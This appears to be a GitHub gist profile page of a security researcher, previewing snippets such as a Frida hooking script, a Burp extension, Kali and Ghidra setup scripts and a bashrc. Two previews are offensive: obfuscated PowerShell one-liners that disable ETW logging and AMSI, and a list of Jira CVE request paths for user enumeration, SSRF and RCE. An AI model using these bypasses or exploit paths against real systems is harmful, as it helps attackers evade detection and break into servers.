Skip to content

Instantly share code, notes, and snippets.

View marcostolosa's full-sized avatar
👽
Memento Mori.

Marcos 'Tr0p' Tolosa marcostolosa

👽
Memento Mori.
View GitHub Profile
@marcostolosa
marcostolosa / frida_tool.py
Created August 2, 2025 22:29
Script Python usando a API do Frida p/ Hookar Funções
import json
import frida
import sys
import threading
from frida_tools.application import Reactor
# ---- Carregar configuração ----
with open("config.json") as f:
config = json.load(f)
@marcostolosa
marcostolosa / update_cookie_BambdaCA.java
Created July 13, 2025 12:11 — forked from irsdl/update_cookie_BambdaCA.java
Automatically updates the Cookie header in Burp Repeater requests using Set-Cookie values from responses. This Bambda CustomAction preserves all existing cookies and only updates or adds values when necessary — ensuring session continuity without overwriting unrelated cookies.
@marcostolosa
marcostolosa / setup-0xkali.sh
Last active June 9, 2025 20:55
0xKali-Setup
#!/bin/bash
echo 'Instalando o VIM Bootstrap (https://vim-bootstrap.com/#tagline)'
mv ~/Downloads/generate.vim ~/.vimrc
vim +PlugInstall +qall
echo 'Instalando as extensões do GDB: PwnDbg, GEF e PEDA'
cd ~/ && git clone https://github.com/apogiatzis/gdb-peda-pwndbg-gef.git
cd ~/gdb-peda-pwndbg-gef
./install.sh
@marcostolosa
marcostolosa / ghidra.py
Created May 26, 2025 20:33 — forked from liba2k/ghidra.py
Script to run Ghidra from the command line including automatic analysis and lunching Ghidra for existing projects.
#!/usr/bin/env python3
import os
import sys
import click
import subprocess
import tempfile
import itertools as IT
import select
from time import sleep
@marcostolosa
marcostolosa / Mips - Ler e imprimir inteiro
Created April 13, 2025 12:05 — forked from bsouza/Mips - Ler e imprimir inteiro
Programinha simples em Assembly Mips para ler e imprimir um inteiro vindo do teclado. O registrador $t7 foi utilizado como convenção entre a chamada das funções para que possa ser reutilizado em outros programas.
.text
.globl inicio
inicio:
jal le_inteiro_do_teclado # chama função para ler
la $t7, 0($v0) # carrega o inteiro lido em $t7
jal imprime_inteiro # manda imprimir o numero lido
j fim # encerra o programa
@marcostolosa
marcostolosa / .bashrc
Created April 13, 2025 12:05
Parrot Os bash theme for ubuntu
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
[ -z "$PS1" ] && return
# don't put duplicate lines in the history. See bash(1) for more options
# ... or force ignoredups and ignorespace
HISTCONTROL=ignoredups:ignorespace
@marcostolosa
marcostolosa / sources.list
Created April 13, 2025 12:05 — forked from h0bbel/sources.list
/etc/apt/sources.list for Ubuntu 18.04.1 LTS Bionic Beaver
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.
deb http://us.archive.ubuntu.com/ubuntu/ bionic main restricted
# deb-src http://us.archive.ubuntu.com/ubuntu/ bionic main restricted
## Major bug fix updates produced after the final release of the
## distribution.
deb http://us.archive.ubuntu.com/ubuntu/ bionic-updates main restricted
# deb-src http://us.archive.ubuntu.com/ubuntu/ bionic-updates main restricted
@marcostolosa
marcostolosa / powershell-bypasses.ps1
Created April 13, 2025 12:05 — forked from reigningshells/powershell-bypasses.ps1
Random PowerShell Bypasses
# Logging bypass:
(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))
# AMSI Bypass (old, burned)
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
# New AMSI bypass obfuscation:
@marcostolosa
marcostolosa / resources.md
Created April 13, 2025 12:04 — forked from muff-in/resources.md
A curated list of Assembly Language / Reversing / Malware Analysis / Game Hacking-resources
=== Vulnerabilidades mais comuns no Jira ===
CVE-2019-8449 Enumeração de usuários: /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
>>==============================<<
CVE-2019-8451 SSRF: /plugins/servlet/gadgets/makeRequest?url=https://victimhost:[email protected]
>>==============================<<
CVE-2019–11581: RCE: /secure/ContactAdministrators!default.jspa
>>==============================<<
CVE-2019-3396 RCE: POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: JIRA ...